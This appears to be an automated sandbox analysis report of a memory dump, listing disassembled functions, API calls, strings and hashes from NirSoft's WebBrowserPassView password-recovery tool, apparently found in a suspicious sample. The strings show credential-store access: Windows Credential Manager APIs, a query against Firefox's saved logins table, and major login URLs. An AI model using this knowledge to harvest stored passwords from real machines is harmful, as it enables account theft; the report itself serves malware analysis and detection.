ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403624
GetModuleHandleW.KERNEL32(00000000), ref: 00403628
LoadIconW.USER32(00000000,00000073), ref: 0040362D
ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403638
GetModuleHandleW.KERNEL32(00000000), ref: 0040363C
LoadIconW.USER32(00000000,00000075), ref: 00403641
ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 0040364C
GetModuleHandleW.KERNEL32(00000000), ref: 00403650
LoadIconW.USER32(00000000,0000006F), ref: 00403655
ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00403660
GetModuleHandleW.KERNEL32(00000000), ref: 00403664
LoadIconW.USER32(00000000,00000076), ref: 00403669
ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00403674

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Image$Icon$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 792915304-0
Opcode ID: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
Instruction ID: 62ec96a61e35675a05b55f01cd8090f0511f6faf4d41b9404683e1d7d0c62212
Opcode Fuzzy Hash: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
Instruction Fuzzy Hash: 6901E1A17957087AF53137B2EC4BF6B7B5EDF81F4AF214414F30C990E0C9A6AD105928

Uniqueness

Uniqueness Score: -1.00%

Function 00406B9F, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 174stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156

GetFileSize.KERNEL32(00000000,00000000,00000104,00000001,00000000,?,00407052,?,?,?,0000001E), ref: 00406BC8
??2@YAPAXI@Z.MSVCRT ref: 00406BDC

Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA

memset.MSVCRT ref: 00406C0B
memset.MSVCRT ref: 00406C2B
memset.MSVCRT ref: 00406C40
strcmp.MSVCRT ref: 00406C64
??3@YAXPAX@Z.MSVCRT ref: 00406DC3
CloseHandle.KERNEL32(Rp@,?,00407052,?,?,?,0000001E), ref: 00406DCC

Strings

---, xrefs: 00406D8E
Rp@, xrefs: 00406DC9, 00406BE6

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Filememset$??2@??3@CloseCreateHandleReadSizestrcmp
String ID: ---$Rp@
API String ID: 2784192885-2834202798
Opcode ID: 94eb7d45b3064e74519a59694890047dd7365216467f7798c66d5ee7b063cd76
Instruction ID: 5360a5981a47af023619c2d52a4e150b55de9ab2e9c88b676a0c17dd944fe9c5
Opcode Fuzzy Hash: 94eb7d45b3064e74519a59694890047dd7365216467f7798c66d5ee7b063cd76
Instruction Fuzzy Hash: 2E51817290815DAAEF21DB558C819DEBBBCEF14304F1040FBE50AA3141DA389FD5DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA44, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040AA6A
memset.MSVCRT ref: 0040AA86

Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585

Part of subcall function 00441C15: GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
Part of subcall function 00441C15: ??2@YAPAXI@Z.MSVCRT ref: 00441C46
Part of subcall function 00441C15: GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
Part of subcall function 00441C15: _snwprintf.MSVCRT ref: 00441CC6
Part of subcall function 00441C15: wcscpy.MSVCRT ref: 00441CF0

wcscpy.MSVCRT ref: 0040AACA
wcscpy.MSVCRT ref: 0040AAD9
wcscpy.MSVCRT ref: 0040AAE9
EnumResourceNamesW.KERNEL32(0040ABE8,00000004,0040A818,00000000), ref: 0040AB4E
EnumResourceNamesW.KERNEL32(0040ABE8,00000005,0040A818,00000000), ref: 0040AB58
wcscpy.MSVCRT ref: 0040AB60

Strings

TranslatorURL, xrefs: 0040AB06
TranslatorName, xrefs: 0040AAF5
strings, xrefs: 0040AB5A
Version, xrefs: 0040AB1C
RTL, xrefs: 0040AB2F
general, xrefs: 0040AADE

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-517860148
Opcode ID: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
Instruction ID: 9c0725b1fda07d439eb4652870f5b63d7404026a1df9010dc4cb7dda8e53314a
Opcode Fuzzy Hash: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
Instruction Fuzzy Hash: 6D21807294021875E720B7529C46ECF7A6CAF40755F90447BF60CB20D2EAB85B948AAE

Uniqueness

Uniqueness Score: -1.00%

Function 004038C4, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F

Strings

CryptReleaseContext, xrefs: 004038E5
CryptCreateHash, xrefs: 004038F1
CryptHashData, xrefs: 00403909
CryptDestroyHash, xrefs: 00403915
advapi32.dll, xrefs: 004038CA
CryptAcquireContextA, xrefs: 004038DB
CryptGetHashParam, xrefs: 004038FD

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
API String ID: 2238633743-1621422469
Opcode ID: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
Instruction ID: 1a4948e4bf817cd33749cdf205c6c1bb7532e39c1774f91cd0a649ea1cfd5687
Opcode Fuzzy Hash: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
Instruction Fuzzy Hash: 18F0F475940744AAEB30AF769D49E06BEF0EFA8B027218D2EE1C1A3651D7B99240CE44

Uniqueness

Uniqueness Score: -1.00%

Function 00410D5D, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(psapi.dll,?,0040F921), ref: 00410D70
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00410D89
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410D9A
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00410DAB
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410DBC
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00410DCD
FreeLibrary.KERNEL32(00000000), ref: 00410DED

Strings

psapi.dll, xrefs: 00410D6B
GetModuleBaseNameW, xrefs: 00410D83
EnumProcesses, xrefs: 00410DB6
GetModuleInformation, xrefs: 00410DC7
GetModuleFileNameExW, xrefs: 00410DA5
EnumProcessModules, xrefs: 00410D94

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2449869053-70141382
Opcode ID: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
Instruction ID: 1ed5449ad40e57d8b224171af96504b1ffda3ff1f81db88aadee6c58e1c1cdad
Opcode Fuzzy Hash: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
Instruction Fuzzy Hash: BB01B574A45312AEE7109B64FC40BFB2EA4B781B42B20403BE400D1396DBBCD8C29A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E191, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040E197
_wcsicmp.MSVCRT ref: 0040E1AC

Strings

/stabular, xrefs: 0040E1E6
/scomma, xrefs: 0040E1FB
/shtml, xrefs: 0040E192
/sxml, xrefs: 0040E1BC
/skeepass, xrefs: 0040E210
/stab, xrefs: 0040E1D1
/sverhtml, xrefs: 0040E1A7

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 2081463915-1959339147
Opcode ID: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
Instruction ID: 054bd0190cb9dfc881084e553ec7e2e67fad8357780775fa0482b63ba5cfd284
Opcode Fuzzy Hash: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
Instruction Fuzzy Hash: 7101DE72ACA31138F83851672D17F971A598FA1B7AF70196FF514D81C6EEAC9000709D

Uniqueness

Uniqueness Score: -1.00%

Function 00410CD9, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0040F928), ref: 00410CE8
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00410D01
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00410D12
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00410D23
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00410D34
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00410D45

Strings

Module32Next, xrefs: 00410D1D
Process32First, xrefs: 00410D2E
CreateToolhelp32Snapshot, xrefs: 00410CFB
Process32Next, xrefs: 00410D3F
Module32First, xrefs: 00410D0C
kernel32.dll, xrefs: 00410CE3

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
Instruction ID: 16f3a03532fd71bf7b987582fee040d1dd7fa58dea07b6b8c7b27d1037cf047a
Opcode Fuzzy Hash: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
Instruction Fuzzy Hash: 92F0F474605321A9A3108BA8BD00BA72FF86781F52B10013BED00D1266DBBCD8C29F7E

Uniqueness

Uniqueness Score: -1.00%

Function 004037C3, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040383E: FreeLibrary.KERNEL32(?,004037CB,00000000,00408635,?,00000000,?), ref: 00403845

LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819

Strings

CredEnumerateW, xrefs: 0040380F
CredDeleteA, xrefs: 004037F7
advapi32.dll, xrefs: 004037CB
CredReadA, xrefs: 004037E3
CredFree, xrefs: 004037EB
CredEnumerateA, xrefs: 00403803

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
API String ID: 2449869053-4258758744
Opcode ID: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
Instruction ID: c94656deef6b20b6b745ef32668947add9de3545ed3fb2bb9f52e7e7eb3e89f2
Opcode Fuzzy Hash: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
Instruction Fuzzy Hash: D9012C355007809AD730AF6AC809F06BEE4EF54B02B21886FF091A3791D7B9E240CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004033DF, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192

memset.MSVCRT ref: 00403415
memset.MSVCRT ref: 0040342A
memset.MSVCRT ref: 0040343F
_snwprintf.MSVCRT ref: 00403467
wcscpy.MSVCRT ref: 00403483
_snwprintf.MSVCRT ref: 004034C6

Strings

WebBrowserPassView, xrefs: 004034AB
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004033EF
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004034B9
<table dir="rtl"><tr><td>, xrefs: 0040347D
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040345A

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$_snwprintf$FileWritewcscpywcslen
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$WebBrowserPassView
API String ID: 2731979376-1376879643
Opcode ID: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
Instruction ID: ae32d01ec2d3a7685ec326ba9a70c170c8059c8ae6e66fa8bd15e07dd33865c2
Opcode Fuzzy Hash: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
Instruction Fuzzy Hash: 2E217672D002187ADB21AF55DC41FEA76BCEB08785F0040AFF509A6191DA799F848F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE35, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 153windowCOMMON

Download Yara Rule

APIs

SetBkMode.GDI32(?,00000001), ref: 0040DE90
SetTextColor.GDI32(?,00FF0000), ref: 0040DE9E
SelectObject.GDI32(?,?), ref: 0040DEB3
DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040DEE9
SelectObject.GDI32(00000014,00000000), ref: 0040DEF3
GetModuleHandleW.KERNEL32(00000000), ref: 0040DF0E
LoadCursorW.USER32(00000000,00000067), ref: 0040DF17
SetCursor.USER32(00000000), ref: 0040DF1E
PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040DF64

Strings

WebBrowserPassView, xrefs: 0040DF2C

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CursorObjectSelectText$ColorDrawHandleLoadMessageModeModulePost
String ID: WebBrowserPassView
API String ID: 101102110-2171583229
Opcode ID: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
Instruction ID: 5844c3f8be721e5f4358c4987d475350c1bb70f51af30b4dfd416207439779ca
Opcode Fuzzy Hash: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
Instruction Fuzzy Hash: D451D431A00206ABDB10AFA4C845F6AB7A6BF44315F20853AF507B72E0C779AD15DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040931D, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,004094E9,?,?,00409553,00000000), ref: 0040933D

Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE

GetFileSize.KERNEL32(00000000,00000000), ref: 0040936D

Part of subcall function 0040928C: _memicmp.MSVCRT ref: 004092A6
Part of subcall function 0040928C: memcpy.MSVCRT ref: 004092BD

memcpy.MSVCRT ref: 004093B4
strchr.MSVCRT ref: 004093D9
strchr.MSVCRT ref: 004093EA
_strlwr.MSVCRT ref: 004093F8
memset.MSVCRT ref: 00409413
CloseHandle.KERNEL32(00000000), ref: 00409460

Strings

h, xrefs: 004093C5
4, xrefs: 00409361

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
String ID: 4$h
API String ID: 4066021378-1856150674
Opcode ID: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
Instruction ID: cde85974a53443ad19b2097b399cb4fe7e1f14935bf37b0ef0624c00476b394c
Opcode Fuzzy Hash: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
Instruction Fuzzy Hash: 333186B1900118BEEB11EB54CC85BEE77ACEF04358F10406AFA08E6181D7789F558B69

Uniqueness

Uniqueness Score: -1.00%

Function 00411C63, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411C91
memset.MSVCRT ref: 00411CA6
_snwprintf.MSVCRT ref: 00411CC0
_snwprintf.MSVCRT ref: 00411CDF
memset.MSVCRT ref: 00411D11
memset.MSVCRT ref: 00411D26
memset.MSVCRT ref: 00411D3B
_snwprintf.MSVCRT ref: 00411D55
_snwprintf.MSVCRT ref: 00411D72

Strings

%%0.%df, xrefs: 00411CB3, 00411D48

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
Instruction ID: 8dc9084977ea8e099579ef4c9ca95b08d60ceca6feee4e1064a0b0e4f5e47a8f
Opcode Fuzzy Hash: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
Instruction Fuzzy Hash: 79313E71800229BAEB20DF55DC85FEBBBBCFF49308F4000EAB609A2151D7749B94CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00410DF5, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00410E0E
wcscpy.MSVCRT ref: 00410E1E

Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC

wcscpy.MSVCRT ref: 00410E6D
wcscat.MSVCRT ref: 00410E78
memset.MSVCRT ref: 00410E54

Part of subcall function 00407723: GetWindowsDirectoryW.KERNEL32(00451698,00000104,?,00410EAD,?,?,00000000,00000208,?), ref: 00407739
Part of subcall function 00407723: wcscpy.MSVCRT ref: 00407749

memset.MSVCRT ref: 00410E9C
memcpy.MSVCRT ref: 00410EB7
wcscat.MSVCRT ref: 00410EC3

Strings

\systemroot, xrefs: 00410E2B

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
Instruction ID: 1a8d2db1a324573a28d88b24eeb1ed9c65cf0fc221c6a4ee7099d5d8ca3d40a6
Opcode Fuzzy Hash: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
Instruction Fuzzy Hash: B121F9B280530479E621E7628D86EEB63EC9F05754F60455FF119E2082FABCA6C58B1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040697E, Relevance: 16.7, APIs: 10, Strings: 1, Instructions: 187stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00441975: memset.MSVCRT ref: 004419A0
Part of subcall function 00441975: wcscpy.MSVCRT ref: 004419B7
Part of subcall function 00441975: memset.MSVCRT ref: 004419EA
Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A00
Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A11
Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A37
Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A48
Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A6F
Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A80
Part of subcall function 00441975: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
Part of subcall function 00441975: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF

memset.MSVCRT ref: 004069BD

Part of subcall function 00407DC0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,004028DC,?,?,00000003,00000000,00000000), ref: 00407DD9

memset.MSVCRT ref: 00406A3C
memset.MSVCRT ref: 00406A51
strcpy.MSVCRT(?,00000000,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AC4
strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406ADA
strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AF0
strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B06
strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B1C
strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B32
memset.MSVCRT ref: 00406B48

Strings

SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00406A03

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
API String ID: 2096775815-1740008135
Opcode ID: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
Instruction ID: 0d09ea3875aa138d6f02baa8234f1932a31c53e7e6ecd19b10853a161b4d72d0
Opcode Fuzzy Hash: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
Instruction Fuzzy Hash: 6D61E9B2C0421EEEDF11AF91DC419DEBBB8EF04314F10406BF505B2191EA79AA94CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00415EAF, Relevance: 16.6, APIs: 11, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED

GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
malloc.MSVCRT ref: 00415EE6
free.MSVCRT(?), ref: 00415EF6
GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F0A
free.MSVCRT(?), ref: 00415F0F
GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415F25
malloc.MSVCRT ref: 00415F2D
GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F40
free.MSVCRT(?), ref: 00415F45
free.MSVCRT(?), ref: 00415F59
free.MSVCRT(00000000,0044A338,00000000), ref: 00415F78

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$FullNamePath$malloc$Version
String ID:
API String ID: 3356672799-0
Opcode ID: 921d0a7259a897f213f630380232b9b221bbaa70b4d2ef9e6fc0aaee11bddb4f
Instruction ID: 788494e2a8c2de429da1840323bde4c0a518de2f45811afbb62912a9d7d550b6
Opcode Fuzzy Hash: 921d0a7259a897f213f630380232b9b221bbaa70b4d2ef9e6fc0aaee11bddb4f
Instruction Fuzzy Hash: F321CB71900108FFEB117FA5DD46CDFBBA9DF80368B20007BF404A2160EA785F809568

Uniqueness

Uniqueness Score: -1.00%

Function 00407363, Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 0040736D

Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156

GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
GlobalLock.KERNEL32 ref: 004073A8
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
GlobalUnlock.KERNEL32(00000000), ref: 004073CD
SetClipboardData.USER32 ref: 004073D6
GetLastError.KERNEL32 ref: 004073DE
CloseHandle.KERNEL32(?), ref: 004073EA
GetLastError.KERNEL32 ref: 004073F5
CloseClipboard.USER32 ref: 004073FE

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
Instruction ID: 70226e125eefff96fe42492f97b8668800667adb6f1e94a7dd2fd5f696112ff0
Opcode Fuzzy Hash: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
Instruction Fuzzy Hash: E311423A904204FBE7105FB5EC4DA5E7F78EB06B52F204176FD02E5290DB749A01DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004121F2, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 00412265

Strings

AppData, xrefs: 0041224A
Common Start Menu, xrefs: 00412232
Startup, xrefs: 0041221D
Common Programs, xrefs: 0041225F
Start Menu, xrefs: 00412216
Favorites, xrefs: 00412224
Programs, xrefs: 0041222B
Common Desktop, xrefs: 00412251
Common Startup, xrefs: 00412258
Desktop, xrefs: 0041220F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 1284135714-318151290
Opcode ID: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
